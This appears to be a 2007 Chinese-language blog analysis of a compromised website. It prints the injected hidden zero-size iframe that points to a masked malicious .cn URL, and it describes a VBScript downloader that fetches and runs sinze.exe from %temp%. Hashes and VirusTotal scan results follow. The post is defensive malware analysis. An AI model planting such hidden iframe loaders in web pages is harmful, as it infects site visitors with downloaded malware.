endurer 原創
2007-01-15 第2版 補充Kaspersky的反應
2007-01-12 第1版
網站的網頁被加入代碼:
/------
<iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0></iframe>
------/
sin**ze*.htm Kaspersky 報為 Trojan-Downloader.VBS.Psyme.ei。
在瀏覽器中開啟該網頁,會看到資訊:
/------
就不讓你看!氣死你 by ******!
------/
其中******處的字串可能是作者暱稱,這裡偶匿了。
還沒完,網頁中接下來有利用Replace()來保護自身的VBScript指令碼,會利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下載檔案 sinze.exe,儲存為 %temp%/g0ld.com,並利用Shell.Application 對象Q 的 ShellExecute 方法 來運行。
sinze.exe 採用 ASPack 加殼
檔案說明符 : D:/test/sinze.exe
擷取檔案版本資訊大小失敗!
建立時間 : 2007-1-12 16:21:11
修改時間 : 2007-1-12 16:21:13
訪問時間 : 2007-1-12 16:28:57
大小 : 88708 位元組 86.644 KB
MD5 : 118e7d74d99e10cef293b254e1dc78ff
Complete scanning result of "__25968", received in VirusTotal at 01.12.2007, 10:20:11 (CET).
| Antivirus |
Version |
Update |
Result |
| AntiVir |
7.3.0.21 |
01.09.2007 |
HEUR/Crypted |
| Authentium |
4.93.8 |
01.12.2007 |
could be a corrupted executable file |
| Avast |
4.7.892.0 |
12.30.2006 |
no virus found |
| AVG |
386 |
01.11.2007 |
no virus found |
| BitDefender |
7.2 |
01.12.2007 |
no virus found |
| CAT-QuickHeal |
9.00 |
01.12.2007 |
no virus found |
| ClamAV |
devel-20060426 |
01.12.2007 |
no virus found |
| DrWeb |
4.33 |
01.12.2007 |
no virus found |
| eSafe |
7.0.14.0 |
01.10.2007 |
Suspicious Trojan/Worm |
| eTrust-InoculateIT |
23.73.112 |
01.12.2007 |
no virus found |
| eTrust-Vet |
30.3.3319 |
01.11.2007 |
no virus found |
| Ewido |
4.0 |
01.11.2007 |
no virus found |
| Fortinet |
2.82.0.0 |
01.12.2007 |
suspicious |
| F-Prot |
3.16f |
01.11.2007 |
no virus found |
| F-Prot4 |
4.2.1.29 |
01.12.2007 |
no virus found |
| Ikarus |
T3.1.0.27 |
01.09.2007 |
no virus found |
| Kaspersky |
4.0.2.24 |
01.12.2007 |
no virus found |
| McAfee |
4937 |
01.11.2007 |
no virus found |
| Microsoft |
1.1904 |
01.12.2007 |
no virus found |
| NOD32v2 |
1972 |
01.11.2007 |
no virus found |
| Norman |
5.80.02 |
01.11.2007 |
no virus found |
| Panda |
9.0.0.4 |
01.12.2007 |
no virus found |
| Prevx1 |
V2 |
01.12.2007 |
no virus found |
| Sophos |
4.13.0 |
01.11.2007 |
no virus found |
| Sunbelt |
2.2.907.0 |
01.12.2007 |
VIPRE.Suspicious |
| TheHacker |
6.0.3.147 |
01.11.2007 |
no virus found |
| UNA |
1.83 |
01.11.2007 |
no virus found |
| VBA32 |
3.11.2 |
01.10.2007 |
no virus found |
| VirusBuster |
4.3.19:9 |
01.11.2007 |
no virus found |
Aditional Information
File size: 88708 bytes
MD5: 118e7d74d99e10cef293b254e1dc78ff
SHA1: 7e562cfafef92b5f17d279beb2c968bd9e612817
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
今天重下載了這個檔案:
檔案說明符 : D:/test/sinze.exe
擷取檔案版本資訊大小失敗!
建立時間 : 2007-1-15 16:11:33
修改時間 : 2007-1-15 16:13:51
訪問時間 : 2007-1-15 16:14:42
大小 : 425569 位元組 415.609 KB
MD5 : 03111c59838bf6e6a16ad64413ed3954
下載過程中曾被KAV6攔截了一次,只得到了414,453位元組。
Kaspersky報為:Virus.Win32.Delf.an